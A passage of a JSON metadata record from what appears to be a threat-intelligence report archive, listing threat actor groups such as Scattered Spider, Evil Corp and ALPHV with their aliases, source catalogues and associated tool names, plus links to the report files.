				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7da6012f-680b-48fb-80c4-1b8cf82efb9c",
			"created_at": "2023-11-01T02:01:06.643737Z",
			"updated_at": "2026-04-10T02:00:05.340198Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"Scattered Spider",
				"Roasted 0ktapus",
				"Octo Tempest",
				"Storm-0875",
				"UNC3944"
			],
			"source_name": "MITRE:Scattered Spider",
			"tools": [
				"WarzoneRAT",
				"Rclone",
				"LaZagne",
				"Mimikatz",
				"Raccoon Stealer",
				"ngrok",
				"BlackCat",
				"ConnectWise"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "50068c14-343c-4491-b568-df41dd59551c",
			"created_at": "2022-10-25T15:50:23.253218Z",
			"updated_at": "2026-04-10T02:00:05.234464Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Indrik Spider",
				"Evil Corp",
				"Manatee Tempest",
				"DEV-0243",
				"UNC2165"
			],
			"source_name": "MITRE:Indrik Spider",
			"tools": [
				"Mimikatz",
				"PsExec",
				"Dridex",
				"WastedLocker",
				"BitPaymer",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c3b908de-3dd1-4e5d-ba24-5af8217371f0",
			"created_at": "2023-10-03T02:00:08.510742Z",
			"updated_at": "2026-04-10T02:00:03.374705Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"UNC3944",
				"Scattered Swine",
				"Octo Tempest",
				"DEV-0971",
				"Starfraud",
				"Muddled Libra",
				"Oktapus",
				"Scatter Swine",
				"0ktapus",
				"Storm-0971"
			],
			"source_name": "MISPGALAXY:Scattered Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b296f34c-c424-41da-98bf-90312a5df8ef",
			"created_at": "2024-06-19T02:03:08.027585Z",
			"updated_at": "2026-04-10T02:00:03.621193Z",
			"deleted_at": null,
			"main_name": "GOLD DRAKE",
			"aliases": [
				"Evil Corp",
				"Indrik Spider ",
				"Manatee Tempest "
			],
			"source_name": "Secureworks:GOLD DRAKE",
			"tools": [
				"BitPaymer",
				"Cobalt Strike",
				"Covenant",
				"Donut",
				"Dridex",
				"Hades",
				"Koadic",
				"LockBit",
				"Macaw Locker",
				"Mimikatz",
				"Payload.Bin",
				"Phoenix CryptoLocker",
				"PowerShell Empire",
				"PowerSploit",
				"SocGholish",
				"WastedLocker"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d706edf6-cb86-4611-99e1-4b464e9dc5b9",
			"created_at": "2023-01-06T13:46:38.839083Z",
			"updated_at": "2026-04-10T02:00:03.117987Z",
			"deleted_at": null,
			"main_name": "INDRIK SPIDER",
			"aliases": [
				"Manatee Tempest"
			],
			"source_name": "MISPGALAXY:INDRIK SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c2f84ab8-e990-4fa8-97db-81eb3166b207",
			"created_at": "2025-10-29T02:00:51.915334Z",
			"updated_at": "2026-04-10T02:00:05.318636Z",
			"deleted_at": null,
			"main_name": "Storm-0501",
			"aliases": [
				"Storm-0501"
			],
			"source_name": "MITRE:Storm-0501",
			"tools": [
				"Impacket",
				"Tasklist",
				"Cobalt Strike",
				"Rclone",
				"Nltest",
				"AADInternals"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "eb01bdec-5c18-4479-b343-cf58076dacf1",
			"created_at": "2024-08-10T02:02:56.273673Z",
			"updated_at": "2026-04-10T02:00:03.773129Z",
			"deleted_at": null,
			"main_name": "GOLD CRESCENT",
			"aliases": [
				"Hunters International",
				"World Leaks"
			],
			"source_name": "Secureworks:GOLD CRESCENT",
			"tools": [
				"Hunters International",
				"SharpRhino"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7e7782b0-8b0b-4e92-b58a-c696b6d70ea1",
			"created_at": "2025-05-29T02:00:03.18524Z",
			"updated_at": "2026-04-10T02:00:03.843199Z",
			"deleted_at": null,
			"main_name": "Storm-0249",
			"aliases": [
				"DEV-0249"
			],
			"source_name": "MISPGALAXY:Storm-0249",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d093e8d9-b093-47b8-a988-2a5cbf3ccec9",
			"created_at": "2023-10-14T02:03:13.99057Z",
			"updated_at": "2026-04-10T02:00:04.531987Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"0ktapus",
				"LUCR-3",
				"Muddled Libra",
				"Octo Tempest",
				"Scatter Swine",
				"Scattered Spider",
				"Star Fraud",
				"Storm-0875",
				"UNC3944"
			],
			"source_name": "ETDA:Scattered Spider",
			"tools": [
				"ADRecon",
				"AnyDesk",
				"ConnectWise",
				"DCSync",
				"FiveTran",
				"FleetDeck",
				"Govmomi",
				"Hekatomb",
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"Lumma Stealer",
				"LummaC2",
				"Mimikatz",
				"Ngrok",
				"PingCastle",
				"ProcDump",
				"PsExec",
				"Pulseway",
				"Pure Storage FlashArray",
				"Pure Storage FlashArray PowerShell SDK",
				"RedLine Stealer",
				"Rsocx",
				"RustDesk",
				"ScreenConnect",
				"SharpHound",
				"Socat",
				"Spidey Bot",
				"Splashtop",
				"Stealc",
				"TacticalRMM",
				"Tailscale",
				"TightVNC",
				"VIDAR",
				"Vidar Stealer",
				"WinRAR",
				"WsTunnel",
				"gosecretsdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9806f226-935f-48eb-b138-6616c9bb9d69",
			"created_at": "2022-10-25T16:07:23.73153Z",
			"updated_at": "2026-04-10T02:00:04.729977Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Blue Lelantos",
				"DEV-0243",
				"Evil Corp",
				"G0119",
				"Gold Drake",
				"Gold Winter",
				"Manatee Tempest",
				"Mustard Tempest",
				"UNC2165"
			],
			"source_name": "ETDA:Indrik Spider",
			"tools": [
				"Advanced Port Scanner",
				"Agentemis",
				"Babuk",
				"Babuk Locker",
				"Babyk",
				"BitPaymer",
				"Bugat",
				"Bugat v5",
				"Cobalt Strike",
				"CobaltStrike",
				"Cridex",
				"Dridex",
				"EmPyre",
				"EmpireProject",
				"FAKEUPDATES",
				"FakeUpdate",
				"Feodo",
				"FriedEx",
				"Hades",
				"IEncrypt",
				"LINK_MSIEXEC",
				"MEGAsync",
				"Macaw Locker",
				"Metasploit",
				"Mimikatz",
				"PayloadBIN",
				"Phoenix Locker",
				"PowerShell Empire",
				"PowerSploit",
				"PsExec",
				"QNAP-Worm",
				"Raspberry Robin",
				"RaspberryRobin",
				"SocGholish",
				"Vasa Locker",
				"WastedLoader",
				"WastedLocker",
				"cobeacon",
				"wp_encrypt"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e424a2db-0f5a-4ee5-96d2-5ab16f1f3824",
			"created_at": "2024-06-19T02:03:08.062614Z",
			"updated_at": "2026-04-10T02:00:03.655475Z",
			"deleted_at": null,
			"main_name": "GOLD HARVEST",
			"aliases": [
				"Octo Tempest ",
				"Roasted 0ktapus ",
				"Scatter Swine ",
				"Scattered Spider ",
				"UNC3944 "
			],
			"source_name": "Secureworks:GOLD HARVEST",
			"tools": [
				"AnyDesk",
				"ConnectWise Control",
				"Logmein"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6a0c148e-64fe-40fa-a35a-4d9a6ddd7fb0",
			"created_at": "2024-10-04T02:00:04.769179Z",
			"updated_at": "2026-04-10T02:00:03.716865Z",
			"deleted_at": null,
			"main_name": "Storm-0501",
			"aliases": [],
			"source_name": "MISPGALAXY:Storm-0501",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "830ec576-b163-4d11-b711-fee2aa0f2ee1",
			"created_at": "2026-02-03T02:00:03.446725Z",
			"updated_at": "2026-04-10T02:00:03.944446Z",
			"deleted_at": null,
			"main_name": "TA584",
			"aliases": [
				"Storm-0900"
			],
			"source_name": "MISPGALAXY:TA584",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434903,
	"ts_updated_at": 1775792179,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aa876d3205880558d4244c07bff002c63906d9c8.pdf",
		"text": "https://archive.orkl.eu/aa876d3205880558d4244c07bff002c63906d9c8.txt",
		"img": "https://archive.orkl.eu/aa876d3205880558d4244c07bff002c63906d9c8.jpg"
	}
}